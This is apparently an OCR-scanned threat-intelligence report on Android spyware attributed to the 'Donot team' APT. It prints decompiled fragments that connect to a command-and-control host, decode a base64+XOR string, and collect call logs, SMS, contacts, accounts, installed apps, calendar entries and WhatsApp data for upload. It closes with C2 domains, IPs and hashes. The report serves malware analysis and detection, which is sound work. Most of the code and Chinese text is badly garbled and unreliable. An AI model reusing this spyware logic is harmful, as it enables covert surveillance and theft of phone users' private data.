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2) apkfXA%EEHY , RRIRARASFFARMUEMIRIALLIE | TATARASIS RS T IRIBLLIE

String w12 = "resoclwve host";
String w13 = "failed toc conmect"”;
String w14 = "Skip:";
String wl3 = "rcount";
long vl6 = 120000;
try {

vi.p.b{);

deteat.es.getInt (vl3, 5);
deteat.a = deteat.e.getString(vll, "1.2"};
v71.1 = Integer.valueCf (dcteat.s.getInt ("pobusk", 48765));
vl = new StringBuilder();
v1l.append(dcteat.a);
v1l.append(vl0);
vl.append(String.valuelf (v7.1)};
vl.toString(};
| deteat.a = v7.p.a("PykaVARDORA 3bglICQ=—", "REwlswir"}; |
vi.1l = c.d.a.a.a;
vd = new Socket(Inethddress.getByName (docteat.a), v7.l.intValue(});
v4,.z3etSoTimeout (120000) ;
v3 = new DatalnputStream(vd.getInputStream());
vl 1 = new DataCutputitream(v4.getOutputStream());

}

catch (Exception w0} {
vlE = vE;
v24 = v8;
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3) EHKC2 , BAIRMRAFH AN C2{EEMEMALIE , MAAARAXC2M T % , MEARA
base64+XOR key

public String a{String arg&, String arg7) {

int vl = 0;

byte[] v& = EBa=zecd.decode(arge, 0};

byte[] 7 = argT.getBytes();

byte[] v2 = new byte([v6.I=sngth];

while (vl < vb.lIength) {
v2[vl] = {({byte) (ve[vl] ™~ vT[vl % v7.I=ngth])};
++vl;

}

return new String(vd);

4) CAf#3ReRE
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5) iR fEHIC2 : mimestyle.xyz:48765

try {
vl.g = vT.e.split("/");
if{v7.qg.lesngth '= 16) {

goto label 277;

}

vi.a(vl.g[0].trim(), "Call", dcteat.j.a);
vi.a({vl.g[l] .trim(}, "CT", dcteat.7j.b};
vi.a(vl.g[v23].trim(), "SMS", dcteat.j.c);
vT.a{vT.g[v22] .trim(), "EKey", dcteat.7j.d);
vT.a({vT.g[ve].trim(), "Tree", dcteat.j.e);
vT.a{v7T.g[5].trim(), "AC", dcteat.j.f);
vT.a{vT.g[6].trim(), "Net", decteat.j.g);
vi.a(vl.g[7].trim(), "CR", decteat.7j.h};
vi.a({vl.g[B] .trim(), "LR", dcteat.7j.i};
vi.a({vl.g[9] .trim(), "F3", dcteat.7.7j};
vi.a({vl.g[1l0]).trim(}, "GP", dcteat.7j.k);
vT.a{vT.g[11l].trim{), "PK", dcteat.7F.I);
vT.a({vT.g[12].trim(), "BW", dcteat.j.m);
vT.a{vT.g[13].trim(), "CE", dcteat.j.n);
vT.a{vT.g[1l4] .trim (), "Wapp", dcteat.j.o);

}

catch (Exception w0} {

goto label 137;

6) X C2RMEIKTES , IRIETESHRIVER LIL , SHFHFEL MR T
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7)

try

M7 =z
eNEn

i

vl 2.af{vZ 3, v3 1, v4 3, v32 3, vo_1);

this.a({"NE", "netinfo.txt", +28, v27, dcteat.j.g);
this.a({"CT", "contacts.t=xt", v28, +27, dcteat.j.b);
this.a({"Call", "Calllogs.txt", w28, v27, dcteat.j.a);
thi=z.a("sMS", "sms.txt", v28B, v27, dcteat.j.c);
this.a("Tree", "Tree.txt", v28, w27, dcteat.j.s);
thi=.a("GP", "GP.txt", w28, v27, dcteat.j.k);
thiz.a("Hey", "keys.t=zt", v2B, v27, dcteat.j.d);
this.a{"Live", "Live.t=zt", v2B, 27, dcteat.j.h);
this.a({"PK", "pkinfo.t=zt", v2B, v27, dcteat.j.I);
this.a({"CE", "ce.txt", w28, v27, dcteat.j.m);
this.a("BW", "bw.t=xt", w28, +27, dcteat.j.n);
if(!decteat.r) |

goto label 430;

164 B A R R [R) S A

catch (Exception w1} {

try {
vl.getMessage () ;
label 23:
if (deteat.e.getInt(v0, 1) !'= 1) {
return;

}

Cursor vl_3 = this.a.getContentResolver().query(CallLogSCalls.CONTENT DRI, null, null,

null, null);

this.b = vl_3.getColumnIndex ("number"} ;
this.c = vl 3.getColumnIndex("type");
this.d = vl_3.getColumnIndex("date"};
this.2 = vl 3.getColumnIndex("duration");

v3 = new FileCutputStream({mew File(dcteat.e, "Calllogs.txt"));
this.k = new JSCH&rrav();

while (true) {

label 33:

if(!vl 3.moveToNext(}) {
goto label 106;

H

this.f = vl 3.getString(this.b);

this.i = vl 3.getString(this.e);

this.h = vl 3.getString(this.d);

this.g = Integer.parselnt(vl 3.getString(this.c});

vd = mew Date({Long.valueOf (this.h).longValue()});
if (this.g = 1} {

v5 = "INCOMING ";

goto label E5;

H

else if(this.g = 3) {
¥v2 = "Missed ";
goto label E3;

H

else if(this.g = 2} {
v3 = "OutGoing ";
label B35:
thi=.j = v3;
}

hreak:
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8) IREUBVEICRARRARS

String
String
String
String
String
String
String
String
Ckject
String
String

v
o

vl =

vll
vlz2
vl3
vld
vl5
vle

"SMS";
"Sent";
"Unknown" ;
"Inbox";

"android.provider.Telephony. SM3 SENT";
"android.provider.Telephony.SMS RECEIVED";

"date";
Ilbcd}rll;

= w3;

v3 1 = "address";
vl 1 = "type";
if(v7 !'= w0 2) {

=7

goto label &7;

}
try {
ContentValues v0 3 = new ContentValues();
v0 3.put(v3 1, v4[vZ].getCriginatinghddress(});
w0 3.put(vls, vi[vZ].getMessageBody().toString());
w0 3.put(vl4, vb.format(new Date(}));
if{arg2l.gethAction() .compareTolgnoreCase (v13) = 0)
w0 _3.put(vl_1, +ll);
}
else {
goto label 54;
}
label &0:
dcteat.g.d.insert(vE, mull, +0 3};
goto label £84;
label 54:
if {arg2l.gethetion() .compareTolgnoreCase (vl12) = 0)

vl 3.put{vl 1, »8);
goto lakel &0;

9) FRERJG{EHE <A

{

{
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public void a{} {

Bocount[] w3;

String w1l = "ACfin;

deteat. f.putInt (vl, 1);

deteat. f.commit () ;

try {
w3 = RecountManager.get{this.z).gethccounts () ;
boolean v4 = dcteat.h;

H

catch (Exception v2) {
goto label &&;

}

String wvo "AT";
String we = "AC";
if ('wd) {

goto label 35;

try {
decteat.g.al{ve, a.a);
int v4_1;
for(vd_1 = 0; true; ++vd 1) {
if(v4 1 > v3.length - 1) {
goto label 70;

}

ContentValue=s v7 = new ContentValue=();
vT.put{ve, v3[vd_1].name};

vi.put(vd, v3[vd_1].type);
deteat.g.d.insert (ve, null, v7);

label 35:
this.b = new JSCHArrav();
FileCutputStream v4 2 = new FileCutputStream{mew File{dcteat.c, "accounts.txzt"});
int v7_1;
for(v?_ 1 =0; v7_1 <= wv3.length - 1; ++v7_1) {

10) RERIK {5 2R
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if (arglQ.contains ("CR"))} {
try {
dcteat.n.clear();
FileCutputStream v0_1 = new FileCutputStream(new File (dcteat.g, "Clist.txt"});
label 84:
if (v2 «= this.h.Iength - 1) {
if (this.h[v2].trim().length(} > 0} {
this. h[v2] . trim();
w8 1 = new StringBuilder(};
w8 l.append(this.h[vZ].trim(});
v3 l.append{'\n');
w0 _l.write(String.valueCf(vd l.toString(}).getBytes(});
dcteat.n.add(this.h[v2] .trim());

}

++vi;
goto label EB4;

}

w0 1.close();
return 1;

}

catch(Exception v8 2} {
dcteat.n.clear();
w0 2 = new StringBuilder(};
goto label 120;

1) REFEEEARANE

public void a(} {
dcteat.e.getInt ("PKEi", 0);
try {
FackageManager w0 _1 = this.a.getPackageManager();
List vl = vl l.getInstalledApplicaticons{128);
if (dcteat.h) {
return;

this.b = new JSCHRrrayv();
FileCutputStream v2 = mew FileCutputStream{mew File (dcteat.e, "pkinfo.t=zt"));
Iterator vl _1 = wvl.iterator();
while (vl 1.hasNext()) {
Ckiject v3 = vl _l.next();
J50NCbject w4 = mew JSONCbhject();
vd.put ("FN", ((ipplicationInfo)wv3).packageName);
vd.put ("AN", v0 l.gethpplicationbabel (({(ZpplicationInfo)wd)));
thi=.b.put(vd);

v2.write(thi=.b.toString() .getBytes());
this.b = new JSCHRrrav();
va.closel();

}

catch (Exception v0) {
StringBuilder vl 2 = a.a{"Error = ");
vl 2.append(v0.getMes=sage());
vl 2.toString();

}
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12) I RIS EAR KA

v4 = h;

if (argl0d.contain= ("LR"}} {

try {

this.p.F = this.h[6].split (" ");

vD 1 = new StringBuilder();
.append (this.kh[6]);

w3 1
w8 1
w8 1
vi 1

if(this.p.F.I=zngth — v4) |

labe

this.
this=s.
this.
this.

dcte

.append ("

.append (this.p. F. Isngth) ;

")

.toString();

thi=s.p.D
w0 3 =0

- -
R T

= wi;

if{v8 3 » this.p.F.length - 1} {

}

this.
this.
this.
this=s.
this.
this.
this.
thi=s.
this.
this.
this.
this=s.
this.
++thi=.p.
++v8 3;

gote lake

om0

al

R AR R LR

s =

-

woo
oWk W W
I

DDPD

et

a

13) FEREMIAE

(thi=.

-

goto label 274;

this.p. F[v3 3].split(">"});
thi=.p.3[0].=plit(v0);
Integer.parseInt (this.p.v[0]};
Integer.parselnt (this.p.v[1]};
this.p.3[1].5plit{v0);

= Integer.parselnt (this.p.v[0]});

= w3 _3;
fal=e);

.O.a.get (vl 3).
.O.a.get (vl 3).
Ooa.get (vl 3).
.O.a.get (vl 3).

I;

- - q e
4 L3y

=)

= Integer.

Integer.
Integer.
Integer.

Integer.parselnt (thi=.p.v[1]);

valueOf (this
valueOf (this
valueOf (this
valueOf (this

BV} ;
.p.H};
B-¥)i
N =N-4
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public veid a{} {

Cursor vl 1;
int vl12;
int v11;
int v10;
int v&;
String w0 = "Error = ";
try {
this.b = new JSCHRrrav();

ContentResoclver w2 = this.a.getContentResolver();
Uri w3 = Uri.parze("content://com.android.calendar/events"});

String[] v4 = new String[6];

v8 = 0;

v4[0] = "ecalendar id";
v4[1l] = "title";

v1ld = 2;

v4[v1l0] = "description";
vll = 3;

v4[vll] = "dtstart";

vlz = 4;

vd[vlZ] = "dtend";

v4[5h] = "eventLocation";

vl 1 = v2.query(v3, v4, null, null, null);

if (vl l.getCount(} <= 0} {

return;
}
if{!vl 1.moveToFirst()) {
return;
}
label 35:

while(vE > vl l.getCount(} - 1) {
goto label 75;
}
}
catch (Exception wl) {
goto label E3;

}

try {
J50NATrray v2 2 = new JSCHATrTay();
J50NChbject v3 1 = mew J3CNChbject();
JS0NChbject v4 1 = mew JSCNChject();
v4 l.put("ne", vl l.getString(l));

vi l.put("=d", d.a(long.parselong(vl l.getString(vll)}}});
v4 l.put("ed", d.a(long.parselong(vl l.getString(vl2)}}});

14) FREXE H1TF2AE R A
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try {
SQLiteDatabase v3 2 = w3 1l.d;
StringBuilder v& 3 = mew StringBuilder();
v6_3.append("select * from Wapp where mdhid=\'");
ve 3.append(((String)wvd 1}};
ve 3.append(v0);
if(v2 2.rawQuery(vée 3.toString(), v7).getCount() <= 0) {
goto label 39;

}

ContentValues w5 3 = mew ContentValues();

w5 3.puk("Sent", "Yes");

SQLiteDatabase v 4 = dcocteat.g.d;

ve 4.update(vE, w3 3, "md5id=\'" + ({({string)wid 1)) + w0, v7);
goto label 35;

H
catch (Exception v2 2) {
try {
label &E:
vZi Z.getMessage();
goto label 39;
label 70:
if(vd.length({} <= 0) {
goto label 899;
}
vd.toString();
H
catch (Exception w0 1) {
goto label B3E;
}
}
try {
vl 2 = new FileCutputStream(new File (dcocteat.e, "WappHolder.txt"), true);
}

15) S5WhatsApp#d <AL
=. XBOHT:
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this.tr = this.tem.split("/");
if (this.tr.length = 16) {

this.getfg(this. tz[0].trim(),

runto vl = this;

this.getfg(v0.

tr[l).trim(),

vl = this;

this.getfg(v0.

tz[2).trim(),

wl = this;

this.getfg(v0.

tr[3).txim(),

wl = this;

this.getfg(v0.

tr[d].trim(),

v0 = this;

this.getfg(v0.

tr[5].txim() .

vl = this;

this.getfg(v0.

tr[6].txim(),

vl = this;

this.getfg(v0.

tr[T).trim (),

w0 = this;

this.getfg(v0.

tr[8).trim(),

wl = this;

this.getfg(v0.

tr[9).trim(),

wl = this;

this.getfg(v0.

tr[10] .trim()

vl = this;

this.getfg(v0.

tr[ll1] .trim{()

vl = this;

this.gecfg(v0.

er[12] .trim()

v0 = this;

this.getfg(v0.

tr[13].trim()

w0 = this;

this.getfg(v0.

tr[14] . trim()

"Call",
"CT", ten.fg.ccleg);
"SMS", ten.fg.mlog);
"Hey", ten.fg.klog);
“"Tree", ten.fg.tlog);
"AC", ten.fg.wlog);
"Het", ten.fg.nleg);
"CR", ten.fg.crleg);
"LR", ten.fg.lrleg);
“F5", ten.fg.fsleg);
: "GE", ten.fg.gslog);
s "PK", ten.fg.pklog);
. "BW", ten.fg.csleg);

r "CE", ten.fg.bwleg);

ten. £fg.cleg) ;

; "Wapp", ten.fg.wvappleg);

try {

}

vT.g = vl.e.split("/");

if(v7.g.length '= 16) {
goto label 277;

}

vT.a(vl.g[0].trim(), "Call", dcteat.j.a);
vT7.a(v7l.g[1l].trim{), "CT", dcteat.j.b);
vT.a(vi.g[v23].trim(), "SMS", dcteat.j.c);
vT.a(vl.glv22] .trim(), "Key", dcteat.7j.d);
vT.a({vl.g[ve].trim(), "Tree", dcteat.j.e);
vT.a(vl.g[5] .trim(), "AC", dcteat.j.f);
wT.a(vl.g[6].trim(), "Net", decteat.j.g);
vT.a(vl.gl[7].trim(), "CR", dcteat.j.h);
vT.a(vl.g[8] .trim(), "LR", dcteat.j.i);
v7.a({v7.g[9] .trim(), "FS", dcteat.j.j);
vT.a(vl.g[1l0].trim(), "GP", dcteat.j.k);
vT.a(v7.g[1l]).trim(), "PK", decteat.j.l);
v7.a(v7.g[12] .trim(), "BW", dcteat.j.m);
vT.a(vl.g[13].trim(), "CE", dcteat.j.n);
vT.a(v7.g[14] .trim(), "Wapp", dcteat.j.o);

1) 58 Hidonot team RATH & AR , ITHIHESTE—Hf

while (this.s=ndf) ;

thi=.
thi=.

this

this=

thi=s

sendlogs ("Call"
zendlogs ("CT",

.zendlogs ("SMS",
this.
this.
this=s.

sendlogs ("Hey",
zendlogs ("Tree"
sendlogs ("AC",

.sendlogs ("NE",
this.
this.

sendlogs ("GP",
sendlogs ("Live"

.2endlogs ("FK",
this.
this.

zendlogs ("CE",
zendlogs ("BW",

, "CallLogs.t=xt", ¥v3, v,

ten. fg.clog);

"contacts.txt", v3, w6, ten.fg.ecclog);

"sms.txt", v3, v&, ten.fg.mlog);
"keys.txt", v3, wve, ten.fg.klog);
; "Tree.txt", v3, v&, ten.fg.tlog);
"acoounts. txt", v3, ve,
v3, wb, ten.fg.nlog);

ve, ten.fg.gslog);
v3, ¥e, ten.fg.crlog);
v3, vh, ten.fg.pklog);
ve, ten.fg.celog);

"netinfo.txt",
"GE.txt", 5,
, "Live.txt",
"pkinfo. txt",
"oe.txt", wh,
"bw.txt", wh,

vh, ten.fg.bwvlog);

if({(ten.FappFileSend) && 'ten.WappRunning) |

this.sendlogs ("Wapp",

"WappHolder. txt", v3, v6,

ten. fg.vlog);

ten. fg.vapplog) ;
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try {
vl 2.af{vZ 3, v3 1, v4 3, v32 3, vo_1);
this.a({"NE", "netinfo.txt", +28, v27, dcteat.j.g);
this.a({"CT", "contacts.t=xt", v28, +27, dcteat.j.b);
this.a({"Call", "Calllogs.txt", w28, v27, dcteat.j.a);
thi=z.a("sMS", "sms.txt", v28B, v27, dcteat.j.c);
this.a("Tree", "Tree.txt", v28, w27, dcteat.j.s);
thi=.a("GP", "GP.txt", w28, v27, dcteat.j.k);
thiz.a("Hey", "keys.t=zt", v2B, v27, dcteat.j.d);
this.a{"Live", "Live.t=zt", v2B, 27, dcteat.j.h);
this.a({"PK", "pkinfo.t=zt", v2B, v27, dcteat.j.I);
this.a({"CE", "ce.txt", w28, v27, dcteat.j.m);
this.a("BW", "bw.t=xt", w28, +27, dcteat.j.n);
if (! dcteat r} {

goto label 430;

) RARNIESEMNIAHE AR, ATRAHANR—RAT,
M., RLEY

#%JJLAPTiHéR%TXT%fJ] R EEES N, BRI, BT TEA
R, FEEREREREN , JUEE/IVG , ATSERITREN

EEREFHI LERT RN ;
2 W RIBT AT ENN BT TERFINLA , BRETHZNEETRREK.
3. KB FHRFHIRERS: , [RRBLHBEFAF ARG IRRB LA ReME.

4 HFFNV A FERE BN L2 T-Secs %&EIZHN*/JJJZ{:JL (BRER) MBERBHITAHITR
M, BNELT-SecE K BIMGINAS: , EE:J:H%VR?éA N, KFEBRESNiGREEE
I, AR BB IRANEEARNIETI RS | A AR50 KA S 5 X b LS ) -
TN BERHENE . S%454% : https://cloud.tencent.com/product/nta
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4. loC:

C2:

mimestyle.xyz
whynotworkonit.top
rythemsjoy.club
genwar.drivethrough.top
mangasiso.top
spectronet.pw
jasper.drivethrough.top
param.drivethrough.top
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206.189.42.61
198.13.57.49
138.68.81.74
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47efae687575e61f94b1ad8230f03e46

b7e6a740d8f1229142b5cebb1c22b8b1

103cfbc4f61dd642f9f44b8248545831

be4117d154339e7469d7cbabf7d36dd1

781f90d9dab226b1a0251d8cd4732d51

c3c82fa13bfSbaddfbdfe378e379a956

649588f10d0bd618ecb9987912¢c211d8

7bb0b6eb3383be5cecdb2eabf273c7f9

48dd7291b1cd3e5054a6d8b15f0b9ffe

c2da8cc0725558304dfd2a59386373f7

397ed4c4c372fe50588123d6885497¢3

843e633b026c43b63b938effa4a36228

c9b39034b9%a1ba04d6685fe 1b06ab8a7

e5fdb83c9c9c677132f2d3ee51a438a8

2f4a415008a5ee5357559eeb27de72dc

ffde2dda2cab65c25a8b18dfb17c9f4e

f008d370855653a30d9aaa52c2c28188

d07af74db6ede5266c65624472a7b30b

ff64317aa0e9fb1db212934d91305628

582abd096edc46a8b3f9668ac87a837d

1967aeeaf7bef281d877065656¢19f2f

29cf1db34f6b03a2e02ea491cb3bab9c

c13b8a86d2137¢c1d7d2cfb8da27b20ec

2f95cab44e37f7244d4fcc1d63fa7942

43aac5543b41bc2272b590e4901bebae
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